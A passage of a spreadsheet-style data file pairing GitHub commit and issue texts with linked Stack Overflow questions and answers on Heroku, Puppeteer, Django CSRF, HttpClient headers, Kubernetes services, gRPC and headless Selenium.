&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it does not seem to be applied. I do not see the span using the inspector.
Does anyone has any advice ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C966</t>
  </si>
  <si>
    <t>Solving heroku deployment issue http://stackoverflow.com/questions/28307742/how-to-make-heroku-automatically-run-compilemessages-just-as-it-runs-collectstat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;Create a file in your project root: &lt;code&gt;bin/post_compile&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Add the line &lt;code&gt;./manage.py compilemessages&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;git push origin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;git push heroku&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As you push your branch to Heroku, it should now run that command. I'm not certain whether having a custom &lt;code&gt;bin/post_compile&lt;/code&gt; file will override the autodetection that Heroku does, so if you find that it's no longer running &lt;code&gt;collectstatic&lt;/code&gt;, just pop that line in under your &lt;code&gt;compilemessages&lt;/code&gt; line, but add &lt;code&gt;--noinput&lt;/code&gt; to the line so that the management command doesn't prompt you to type "Yes" to confirm you want to overwrite existing files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Here is an interesting combination, I need to transfer data between an "appliance" running Windows XP Home and a remote Linux server on the internet.  Let me itemize what needs to happen:
The "xp home" system needs to transfer data or files every 30 minutes or so. (sftp?)
The Linux server need to contact the "XP Home" system to request data.
Seems simple enough eh?  I was thinking about using web services on the Linux side and thought It would be nice to do the same on the XP Home system.  But some of my research says that won't work on XP Home for answering incoming web service calls.  Maybe that's wrong?  So what about RESTful services will that do the trick?  
BTW: Since this is a new application I can do the development on both ends. C# on the Windows side and Java on the Linux side.  
Ideas are appreciated!
</t>
  </si>
  <si>
    <t>C967</t>
  </si>
  <si>
    <t>Hacky Puppeteer!
Wow, this is sick! Got this set up using Puppeteer, and an HTTP server to host the site on localhost, which will be where the HTML is rendered to. Is there a better way of doing this that I haven't thought about yet? This is working out, but it does seem a bit ugly to have it working like this 😂
`tsx ./test`
This commit name is absolutely going to be a song name of mine.
I think this could indeed be a neat Electron app too, if all of this was done through a GUI, you could probably use the Electron backing for Puppeteer too right? I've seen a few sources and example of being able to do that. So you could have your app GUI run in Electron, and it would use that same implementation for the renderer window too. I like the CLI approach personally though, so I'm going to experiment with that to start with.
I think the GUI-app way is probably easier for more general users though, so I think that could be more worthwhile. It might make the renderer/Node interations a bit simpler too, as you'd only have to have the GUI bit, and you could use Context Bridges from Electron to get the Node communication set up? That worked fairly nicely in my now classic Electron Text Editor project.
Yeah, Tauri could be nice for this, but that's a bonus thing to worry about later. Having something working to start with is the initial goal yet again for this project here :)
https://stackoverflow.com/questions/47587352/opening-local-html-file-using-puppeteer
https://flaviocopes.com/node-serve-html-page/
https://stackoverflow.com/questions/46745014/alternative-for-dirname-in-node-js-when-using-es6-modules</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just did a test locally (you can see I did this on windows) and puppeteer happily opened my local html file using page.goto and a full file url, and saved it as a pdf:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'use strict';
const puppeteer = require('puppeteer');    
(async() =&amp;gt; {    
const browser = await puppeteer.launch();
const page = await browser.newPage();    
await page.goto('file://C:/Users/compoundeye/test.html');    
await page.pdf({
  path: 'test.pdf',
  format: 'A4',
  margin: {
        top: "20px",
        left: "20px",
        right: "20px",
        bottom: "20px"
  }    
});    
await browser.close();    
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you need to use a relative path might want to look at this question about the use of relative file paths: &lt;a href="https://stackoverflow.com/questions/7857416/file-uri-scheme-and-relative-files"&gt;File Uri Scheme and Relative Files&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm struggling with App Clips and what appears to be a Black Box technology.&lt;/p&gt;
&lt;p&gt;So, I have it set up where it &amp;quot;works&amp;quot;.  I can scan a QR code, and it knows the embedded URL is an invocation URL for my app.&lt;/p&gt;
&lt;p&gt;If the app is being launched from a &amp;quot;cold start&amp;quot;, it works just fine.&lt;/p&gt;
&lt;p&gt;If the app (or app clip) is already running in the background, the app will be foregrounded, and the following SceneDelegate method is called:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    func scene(
        _ scene: UIScene,
        willContinueUserActivityWithType userActivityType: String
    ) {
        log.info_(&amp;quot;Continue User Activity with type: \(userActivityType)&amp;quot;)
        if let activity = scene.userActivity {
            log.info_(&amp;quot;\(activity)&amp;quot;)
        } else {
            log.info(&amp;quot;No activity provided!&amp;quot;) // PROBLEM!
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So one would expect that the userActivity is somehow defined, especially the &lt;code&gt;.webpageURL&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Otherwise, how do I get the information from the scanned QRCode so I can handle it properly?&lt;/p&gt;
&lt;p&gt;This whole App Clip stuff just seems busted / unnecessarily cryptic on the Apple side.  Help appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C968</t>
  </si>
  <si>
    <t>fix!(google): use the right sha1 key to apply google authentication
Please refer to : https://stackoverflow.com/questions/68597899/bug-exception-in-phase-semantic-analysis-in-source-unit-buildscript-unsup
https://stackoverflow.com/questions/54557479/flutter-and-google-sign-in-plugin-platformexceptionsign-in-failed-com-google
What is fixed here is not in the code, but it is related to the sha1 key that need to be generated to add the android app to firebase console via google sign in process</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to the official grade docs: Java 17 and later versions are not yet supported.&lt;/p&gt;
&lt;p&gt;You can check compatibility &lt;a href="https://docs.gradle.org/current/userguide/compatibility.html" rel="noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So I have installed &lt;code&gt;Java11&lt;/code&gt; from &lt;a href="https://www.azul.com/downloads/?version=java-11-lts&amp;amp;os=macos&amp;amp;architecture=arm-64-bit&amp;amp;package=jdk" rel="noreferrer"&gt;Azul&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;p.s. don't forget to change jdk version in Android studio which is available only on the Android project, to open it&lt;/p&gt;
&lt;p&gt;&lt;code&gt;File-&amp;gt; open -&amp;gt; select the android folder inside your flutter project -&amp;gt; open in a new window&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Then you can change jdk version
&lt;code&gt;Preferences -&amp;gt; Build -&amp;gt; Build Tools -&amp;gt; Gradle -&amp;gt; Gradle JDK&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Right now a lot of my applications use GWT-RPC for retrieving POJO's from a GWT RemoteService which in turn calls a Web Service (SOAP) to get the data. I am evaluating Flex  and didn't really see anything truly analogous to this simple architecture. Anything I may have missed?
</t>
  </si>
  <si>
    <t>C969</t>
  </si>
  <si>
    <t>removed csrf from authentication, https://stackoverflow.com/questions/26639169/csrf-failed-csrf-token-missing-or-incorrect, permanent solution here</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you are using &lt;a href="http://www.django-rest-framework.org/api-guide/authentication#sessionauthentication"&gt;SessionAuthentication&lt;/a&gt;, you are using Django's authentication which usually requires CSRF to be checked. Django REST Framework enforces this, only for &lt;code&gt;SessionAuthentication&lt;/code&gt;, so you must pass the CSRF token in the &lt;code&gt;X-CSRFToken&lt;/code&gt; header.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://docs.djangoproject.com/en/dev/ref/contrib/csrf/#ajax"&gt;Django documentation&lt;/a&gt; provides more information on retrieving the CSRF token using jQuery and sending it in requests. The CSRF token is saved as a cookie called &lt;code&gt;csrftoken&lt;/code&gt; that you can retrieve from a HTTP response, which varies depending on the language that is being used.&lt;/p&gt;
&lt;p&gt;If you cannot retrieve the CSRF cookie, this is usually a sign that you should not be using &lt;code&gt;SessionAuthentication&lt;/code&gt;. I recommend looking into &lt;a href="http://www.django-rest-framework.org/api-guide/authentication#tokenauthentication"&gt;TokenAuthentication&lt;/a&gt; or &lt;a href="http://www.django-rest-framework.org/api-guide/authentication#oauth2authentication"&gt;OAuth 2.0&lt;/a&gt; depending on your needs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a website with PHP 8.2 currently using jQuery 3.3.1. It sets cookie SameSite =&amp;gt; None, Secure =&amp;gt; true by &lt;code&gt;session_set_cookie_params()&lt;/code&gt; and website have SSL. The session.cookie_lifetime is set for 2 days.&lt;/p&gt;
&lt;p&gt;The website uses payment gateway and Samesite None is required to continue session when user returns from payment gateway. Everything is working fine in website with jQuery 3.3.1 but it has some vulnerability. Hence I changed to jQuery 3.7.1.&lt;/p&gt;
&lt;p&gt;Everything in website fine with jQuery 3.7.1, but session ends when user returns from payment gateway. I tried cleaning browser data after jQuery update and loading website but this problem continues. Website still using SameSite =&amp;gt; None, Secure =&amp;gt; true. These are some queries that I have.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is jQuery 3.7.1 responsible for ending of user session while returning from third-party sites?&lt;/li&gt;
&lt;li&gt;Whether Samesite cookie needs to be set differently if using jQuery 3.7.1?&lt;/li&gt;
&lt;li&gt;Do I have to wait two days after jQuery upgrade (since session.cookie_lifetime is 2 days) to confirm this problem about user session ending?&lt;/li&gt;
&lt;li&gt;Is possible to use jQuery 3.3.1 but avoid its vulnerability?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C97</t>
  </si>
  <si>
    <t>HTTPS: Option to assert authorized before sending request data. (possible security problem) #2247
Original post: http://stackoverflow.com/questions/8304084/node-js-assert-authorized-before-sending-data-over-https
I understand I need to check the response.connection.authorized field to see if the SSL/TLS connection is secure and to the correct server.
Trouble is, I have to send a request before I can check that field. I need a way to assert the connection is authorized before sending any (potentially private) data.
Granted, there needs to already be another security flaw installed such as cache poisoning or router intrusion for this to even matter, but counter-measures expected of HTTPS are a little late due to this issue.</t>
  </si>
  <si>
    <t>After 3 days, I am assuming it can't be done without modification to the https component itself. Correct me if I'm wrong.
I posted an issue report on this.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been reading about &lt;a href="https://github.com/grpc/grpc/blob/master/doc/wait-for-ready.md" rel="nofollow noreferrer"&gt;Wait-For-Ready&lt;/a&gt; in gRPC and wanted to enable it in my app. I'm using &lt;a href="https://www.npmjs.com/package/@grpc/grpc-js" rel="nofollow noreferrer"&gt;@grpc-js&lt;/a&gt; and after digging into the library code (since I couldn't find any documentation about Wait-For-Ready option, only the &lt;a href="https://grpc.github.io/grpc/node/grpc.Client.html" rel="nofollow noreferrer"&gt;client's waitForReady&lt;/a&gt; callback) it seems that it accepts the option through metadata:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;metadata.set('waitForReady', true)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that I would like to test if it really did set the option but I don't know how (tried setting &lt;code&gt;GRPC_TRACE=all GRPC_VERBOSITY=DEBUG&lt;/code&gt; but nothing in the logs).&lt;/p&gt;
&lt;p&gt;Also, I would prefer to set this option via &lt;a href="https://github.com/grpc/grpc-proto/blob/483f11e91a30de9c11d65d872c09bc529e94e2ee/grpc/service_config/service_config.proto#L88" rel="nofollow noreferrer"&gt;service config&lt;/a&gt;, would this work?:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const serviceConfig = {
    methodConfig: [{ name: [{}], waitForReady: true }]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So my questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How can I test that the Wait-For-Ready option is enabled?&lt;/li&gt;
&lt;li&gt;How can I set the Wait-For-Ready option and can I do it via service config?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C970</t>
  </si>
  <si>
    <t>Added HttpClient Change.
http://stackoverflow.com/questions/37928543/httpclient-single-instance-with-different-authentication-headers
http://stackoverflow.com/questions/41412187/create-httpclient-instance-per-webrequest-c</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If your headers are usually going to be the same then you can set the &lt;code&gt;DefaultRequestHeaders&lt;/code&gt;. But you don't need to use that property to specify headers. As you've determined, that just wouldn't work if you're going to have multiple threads using the same client. Changes to the default headers made on one thread would impact requests sent on other threads.&lt;/p&gt;
&lt;p&gt;Although you can set default headers on the client and apply them to each request, the headers are really properties of the request. So when the headers are specific to a request, you would just add them to the request.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;request.Headers.Authorization = new AuthenticationHeaderValue("bearer", bearerToken);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That means you can't use the simplified methods that don't involve creating an &lt;code&gt;HttpRequest&lt;/code&gt;. You'll need to use &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Task&amp;lt;HttpResponseMessage&amp;gt; SendAsync(HttpRequestMessage request)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;documented &lt;a href="https://msdn.microsoft.com/en-us/library/hh138176(v=vs.118).aspx" rel="noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Some have found it helpful to use extension methods to isolate the code that updates the headers from the rest of a method.&lt;/p&gt;
&lt;p&gt;Example of GET and POST methods done through an extension method that allow you to manipulate the request header and more of the &lt;code&gt;HttpRequestMessage&lt;/code&gt; before it is sent:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static Task&amp;lt;HttpResponseMessage&amp;gt; GetAsync
    (this HttpClient httpClient, string uri, Action&amp;lt;HttpRequestMessage&amp;gt; preAction)
{
    var httpRequestMessage = new HttpRequestMessage(HttpMethod.Get, uri);
    preAction(httpRequestMessage);
    return httpClient.SendAsync(httpRequestMessage);
}
public static Task&amp;lt;HttpResponseMessage&amp;gt; PostAsJsonAsync&amp;lt;T&amp;gt;
    (this HttpClient httpClient, string uri, T value, Action&amp;lt;HttpRequestMessage&amp;gt; preAction)
{
    var httpRequestMessage = new HttpRequestMessage(HttpMethod.Post, uri)
    {
        Content = new ObjectContent&amp;lt;T&amp;gt;
            (value, new JsonMediaTypeFormatter(), (MediaTypeHeaderValue)null)
    };
    preAction(httpRequestMessage);
    return httpClient.SendAsync(httpRequestMessage);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These could then be used like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var response = await httpClient.GetAsync("token",
    x =&amp;gt; x.Headers.Authorization = new AuthenticationHeaderValue("basic", clientSecret));
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Reading about the lack of persistence ignorance in Entity Framework I often stumble upon [external-link]. The question is, does anyone use it in production, how does it go and what are the pitfalls?
I consider two alternatives for the application design: use POCOs with that adapter in business logic and make the presentation layer use them or create a service layer converting between EF Entities and DTOs:
(1) EF entities &lt;-&gt; Adapter &lt;-&gt; POCO business objects &lt;-&gt; Presentation
or
(2) EF entities &lt;-&gt; Service layer &lt;-&gt; DTOs &lt;-&gt; Presentation.
The first approach seems to be more clean, but I'm somewhat hesitating about POCO Adapter is not being very standard solution and may contain some shortcomings not evident right now.
</t>
  </si>
  <si>
    <t>C971</t>
  </si>
  <si>
    <t>Implemented proxy authentication as per http://stackoverflow.com/a/11787116/226958</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;here is the correct way of using proxy along with creds..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HttpWebRequest request = (HttpWebRequest)WebRequest.Create(URL);
IWebProxy proxy = request.Proxy;                    
if (proxy != null)
{
    Console.WriteLine("Proxy: {0}", proxy.GetProxy(request.RequestUri));
}
else
{
    Console.WriteLine("Proxy is null; no proxy will be used");
}
WebProxy myProxy = new WebProxy();
Uri newUri = new Uri("http://20.154.23.100:8888");
// Associate the newUri object to 'myProxy' object so that new myProxy settings can be set.
myProxy.Address = newUri;
// Create a NetworkCredential object and associate it with the 
// Proxy property of request object.
myProxy.Credentials = new NetworkCredential("userName", "password");
request.Proxy = myProxy;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks everyone for help... :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When writing python code blocks in a markdown file, the anaconda linting shows up for the whole document. Which results in a lot of white rectangles around markdown text.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/Ddbbnnp4.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/Ddbbnnp4.png" alt="screenshot of sublime text demonstrating linted non python text" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is anyone aware of a way to disable anaconda linting for markdown files ? (I'm aware of the &lt;code&gt;Anaconda: Disable linting on this file&lt;/code&gt; option, I'm looking for a permanent solution)&lt;/li&gt;
&lt;li&gt;Do you know whether this could be solve in anaconda package or in the ST markdown syntax-highlihting mechanism or in the ST linting mechanism&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Steps to reproduce:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;open SublimeText&lt;/li&gt;
&lt;li&gt;install &lt;code&gt;anaconda&lt;/code&gt; package&lt;/li&gt;
&lt;li&gt;create a new document and set syntax highlighting to markdown&lt;/li&gt;
&lt;li&gt;paste the following content&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;
a **paragraph**
```python
# some python code
a = 3
```
&lt;/pre&gt;
&lt;ol start="5"&gt;
&lt;li&gt;the non python lines are surrounded by a white rectangle, whereas they should not be.&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>C972</t>
  </si>
  <si>
    <t>Reusable DataChannel extensions #8
The DataChannel abstraction allows many different implementations. Question is how to publish and allow these implementations to be reused by others. I have currently implemented three new data channels:
https://github.com/koliyo/JSONRPC-DataChannel-UniSocket
Mainly for local unix socket (--pipe argument when using VS Code extension)
Allow logging to stdout while keeping protocol transport on a socket
https://github.com/koliyo/JSONRPC-DataChannel-StdioPipe
Typical stdio pipe mode
https://github.com/koliyo/JSONRPC-DataChannel-Actor
IPC communication using Swift actors
Useful when testing LSP backend with LSP client code, both in Swift and running in the same process
These are currently implemented as standalone repositories.
To me, it seems reasonable to bundle a few basic datachannel implementations as part of the JSONRPC repo itself.
You already have DataChannel+LocalProcess.swift and DataChannel+UserScript.swift. And then you also have DataChannel+HostedProcess.swift which is overlapping with these.
I think my contributions with DataChannel-StdioPipe and DataChannel-Actor could potentially be added directly to JSONRPC, since they are very simple mechanisms and does not have any external dependencies.
The DataChannel-UniSocket is more specific, with external library dependency, and should probably be a separate library.
Thoughts on this?
Ok, sounds reasonable wrt dependencies!
I have created a PR for stdio datachannel.
I also made an attempt at implementing the protocol based Actor without explicit Deque usage. I am afraid my limited swift experience is not enough, regarding the associatedtypes/generic handling.
I have made an attempt here, but it does not yet work:
https://github.com/koliyo/JSONRPC/tree/feature/actor-datachannel
In addition, I tried adding swift-collections as a test-only dependency, but that does not seem to exist in swift?
https://stackoverflow.com/questions/41401753/test-only-dependencies-when-using-the-swift-package-manager
Anyway, please take a look if you can make it work, or if you would consider swift-collections to be an ok dependency. Otherwise the package could be a separate package.
Regarding testing, I have a small test for actor datachannel:</t>
  </si>
  <si>
    <t xml:space="preserve">Currently "Test-only dependencies" feature is disabled in the Swift Package Manager. It was implemented initially, but was removed in this commit. From the commit's description:
Remove testDependencies from PackageDescription This feature was supposed to support dependencies only for the root package but at some point it stopped working however the API still remained open. This patch removes the public API. This is a valid and desired feature which is supposed to come back after it goes through proper review on swift evolution.
</t>
  </si>
  <si>
    <t xml:space="preserve">What I mean by this, is that sometimes architects look to simplify and improve testability, at the expense of other important forces.   
For example, I'm reviewing a very complicated application, made so by extensive use of design patterns that overly favor testing, e.g. IoC, DI, AOP, etc...
Now, typically I like these things, but this system should have been much simpler - though not just a simple web frontend for CRUD on a db, it still not MUCH more complicated than that (even considering some internal workflows, processes, etc). On the other hand, just reviewing the code becomes a major pain in the heinie, barely readable (even though its well written), and coding it must have been a pain.   
The implemented complexity is a clear violator of KISS (the principle, NOT the band)... and the "only" benefit is improved testability, using testing frameworks and mocks and and... 
Now, before you TDD fans jump me, I'm not belittling the importance of testability, but I'm questioning the supremacy of consideration of this specific force (against all the others).
Or did I miss something?
I'd like to add another point - it does seem to me that all this talk of "testability" is with regards specifically to unit testing, which differs from overall system testing, and can result in missed tests when the individual units are integrated together. At least, that seems the point of the IoC/DI for testing...
Also, I'd point out that this system (and others I've seen preached) only have a single concrete object per interface, and the IoC/DI is only intended for - you guessed it - replacing the concrete objects with testing mockups for testing only.  
I felt the need to add this quote from [external-link]:
  Whereas the danger in procedural programming was to end with spaghetti code, the danger when using Inversion of Control is ending with macaroni code
Yup, that expresses my feeling exactly :D
</t>
  </si>
  <si>
    <t>C973</t>
  </si>
  <si>
    <t>Feature Request: Community Plugins/ Packages #21
Will the new version allow users to select their own packages/plugins without having to modify the source code? Perhaps they can simply write the JavaScript code following some guidelines and then install it for either the current session or permanently, depending on their preference.
Packages could be Javascript interfaces for graphs/networks, language processing user interface, and maybe even less common usages like website development.
Plugins would be along the ideas of vs code and obsidian plugins that affect the general user experience with the application.
The "plugins" via links to GitHub repos sounds like a cool idea.
I do not really know the architecture needed for plugin support. I found this question via google: https://stackoverflow.com/questions/10763006/plugin-architecture-in-web-apps-examples-or-code-snippets#:~:text=A%20good%20plugin%20architecture%20is%20difficult%20to%20achieve,polymorphism%2C%20Demeter%27s%20Law%20and%20the%20related%20Hollywood%20principle.
Ideally, the system should be flexible enough to naturally support the type of plugins that vscode and Obsidian can support without having to think a lot and hard code functionalities for the plugin implementation in advance. Examples of such plugins may include :
change the color theme
maybe allow the usage of vim or emacs keybindings (I have not used emacs in a while I do not remember if they look like the usual keybindings)
something like GitHub copilot to work on code using chatgpt
Latex document typing
Highlighting and organizing highlights in a separate window
web development plugins such as automatically adding the closing tag for an opened tag or maybe even a full no code drag and drop HTML building interface like Wix (this seems particularly hard as I am not sure even obsidian or vscode has that kind of flexibility I think).
Automatic code formatting
code linting and documentation hovering for other languages
allow an interactive-only mode that does not allow editing the code (to avoid editing by mistake when working with many versions of a file)
This looks like way too much work for even a team of 30 people maybe. But if the development of the plugin is not too hindered by the architecture design of this application, then if the project gains popularity** people will have the incentive to make and share their implementations.
(**) Specifically with plugin support in a popular language like javascript with the convenience of the Wolfram language, I think the project could be quite popular if it's published on Reddit (if they allow that) and your post on stack exchange is updated when the app is more stable.</t>
  </si>
  <si>
    <t>A good plugin architecture is difficult to achieve from scratch but offers its own rewards.  It makes the software flexible and simple to maintain by localising complexity. The foremost skill it requires is the ability to write loosely coupled code.  This demands a very firm grasp of polymorphism, Demeter's Law and the related Hollywood principle.
I recommend that you initially gain a good familiarity with those, then the following design patterns, which will reduce the difficulty significantly :
Command Pattern: Gives Plugin Modules a consistent entry point, allowing them to be readily swapped in and out, a Web Based example from IBM.
Memento: Capture, hold and externalise state without violating encapsulation, allowing plugins to be configured by the container.
Call Back : Allows the Plugin Modules to access 'services' from the container/environment.
Dependency Injection : A way to loosen the coupling of Plugin Modules from their environment.
Abstract Factory Pattern : Installing and instantiating the Plugin in the environment.
Builder Pattern : Required for any non-trivial plugin architecture where Plugin Modules are dependent on each other.
Once you grasp those, study some of the existing Plugin Framework implementations and architectures to see how they've been used.  Apache have several in Struts, Geronimo custom server assemblies and Tomcat JNDI Resources; Also the Eclipse plugin framework.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a library which uses a header named &lt;code&gt;uuid.h&lt;/code&gt;. Unfortunately, on some GNU/Linux distributions, this header is located at &lt;code&gt;/usr/include/uuid/uuid.h&lt;/code&gt; and on others it's located at &lt;code&gt;/usr/include/linux/uuid.h&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, I do &lt;em&gt;not&lt;/em&gt; want to add both of these subdirectories to the include search, i.e. I do want &lt;code&gt;linux/whatever.h&lt;/code&gt; includes to need the &lt;code&gt;linux/&lt;/code&gt; prefix. But I do want to be able to build with both possible locations of the file.&lt;/p&gt;
&lt;p&gt;I'm using CMake as my build system generator.&lt;/p&gt;
&lt;p&gt;Hw can get I get my build to work, while keeping the source file verbosity for this situation to a minimum?&lt;/p&gt;
&lt;p&gt;I was struggling particularly with the desire to introduce a preprocessor-varaible-value-based component into an include directory - which I don't believe can be done, i.e. I can't do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;UUID_SUBDIR/uuid.h&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and replace &lt;code&gt;UUID_SUBDIR&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C974</t>
  </si>
  <si>
    <t>[Feat] Cross-border communication #150
Spawn clusters are by design namespace bound when they are configured via the ActorSystem CRD. This allows developers to create context-separated independent micro-clusters. However, the side effect of this is that these contexts become completely isolated from each other, making their communication unfeasible.
We also use headless services to discover pod IPs via endpoints and manage to establish communication via libcluster between them. But Services in Kubernetes are namespace resources and for this reason cross namespace communication is not possible either. This also contributes to the isolation of the ActorSystem.
I propose that we solve this problem by using a message broker to allow cross-border communication.
Why would that be important to you?
Allows communication between clusters separated by context.
Additional context
Simplistically speaking the scheme would look like this:
spawn-cross-border-communications
I believe that in each ActorSystem (implemented via Proxy) there would need to be a Global Process controller responsible for consuming messages from the broker and forwarding them to the appropriate processes/actors. The downside of this approach is that this global process in each actorsystem would be a possible bottleneck, since many different processes could be sending messages to other processes in other ActorSystems and this could impact the system under load. Therefore, we must investigate ways to mitigate these effects.
References:
https://stackoverflow.com/questions/37221483/service-located-in-another-namespace</t>
  </si>
  <si>
    <t xml:space="preserve">I stumbled over the same issue and found a nice solution which does not need any static ip configuration:
You can access a service via it's DNS name (as mentioned by you): servicename.namespace.svc.cluster.local
You can use that DNS name to reference it in another namespace via a local service:
kind: Service
apiVersion: v1
metadata:
  name: service-y
  namespace: namespace-a
spec:
  type: ExternalName
  externalName: service-y.namespace-b.svc.cluster.local
  ports:
  - port: 80
</t>
  </si>
  <si>
    <t xml:space="preserve">I know it probably sounds like very trivial question but I couldn't find any resources on the internet.
Could you please tell me what are open and closed layered architectures and why open layered architecture is apparently more difficult to maintin? Are there any disadvantages of using closed/open layered architectures?
</t>
  </si>
  <si>
    <t>C975</t>
  </si>
  <si>
    <t>Implement gRPC to support communication servers.
Source:
https://stackoverflow.com/questions/63955514/how-to-return-listmodel-in-grpc</t>
  </si>
  <si>
    <t>change error line (replyModel.Person = people) to this code
replyModel.Person.AddRange(people);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an automation framework written using selenium, maven and java to test my company portal.&lt;/p&gt;
&lt;p&gt;In the last week or so Im having a major issue with headless execution. My tests do not pass on any OS (Mac, Linux and Windows) when executing in headless. When I execute in non-headless all the tests pass. The second I put it into headless it breaks which I find weird.&lt;/p&gt;
&lt;p&gt;The issue mainly seems to be around dropdowns and data not loading or being visible despite putting in waits and waitForElementVisible lines.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.AssertionError: Element not clickable or not visible org.openqa.selenium.ElementClickInterceptedException: element click intercepted: Element &amp;lt;md-option value=&amp;quot;LOW&amp;quot; tabindex=&amp;quot;0&amp;quot; role=&amp;quot;option&amp;quot; id=&amp;quot;select_option_84&amp;quot;&amp;gt;...&amp;lt;/md-option&amp;gt; is not clickable at point (458, 380). Other element would receive the click: &amp;lt;md-backdrop class=&amp;quot;md-select-backdrop md-click-catcher ng-scope&amp;quot;&amp;gt;&amp;lt;/md-backdrop&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My chrome options configuration is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ChromeOptions options = new ChromeOptions();
            options.setExperimentalOption(&amp;quot;prefs&amp;quot;, chromePrefs);
            options.addArguments(&amp;quot;--start-maximized&amp;quot;);
            options.addArguments(&amp;quot;download.default_directory=&amp;quot; + downloadDirPath);
            options.addArguments(&amp;quot;--test-type&amp;quot;);
            options.addArguments(&amp;quot;--ignore-certificate-errors&amp;quot;);
            options.addArguments(&amp;quot;--disable-extensions&amp;quot;);
            options.addArguments(&amp;quot;--disable-infobars&amp;quot;);
            options.addArguments(&amp;quot;--remote-allow-origins=*&amp;quot;);
            options.addArguments(&amp;quot;--disable-popup-blocking&amp;quot;);
            options.addArguments(&amp;quot;--enable-WebGL&amp;quot;);
            options.addArguments(&amp;quot;--ignore-gpu-blocklist&amp;quot;);
            options.addArguments(&amp;quot;--ignore-gpu-blacklist&amp;quot;);
            options.addArguments(&amp;quot;--headless=new&amp;quot;);
            options.addArguments(&amp;quot;--no-sandbox&amp;quot;);
            options.addArguments(&amp;quot;--disable-features=EnableEphemeralApps&amp;quot;); // Added argument
            options.addArguments(&amp;quot;--disable-dev-shm-usage&amp;quot;);
            options.addArguments(&amp;quot;--disable-software-rasterizer&amp;quot;);
            options.addArguments(&amp;quot;--use-webgl=desktop&amp;quot;);
            options.addArguments(&amp;quot;--disable-search-engine-choice-screen&amp;quot;);
            options.addArguments(&amp;quot;--window-size=1920,1080&amp;quot;);
            options.addArguments(&amp;quot;--allow-running-insecure-content&amp;quot;);
            options.addArguments(&amp;quot;--disable-renderer-accessibility&amp;quot;);
            driver = new ChromeDriver(options);
            driver.get(url);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Im using chromeversion 133.0.6943.127 and latest selenium version from maven (4.28.1)&lt;/p&gt;
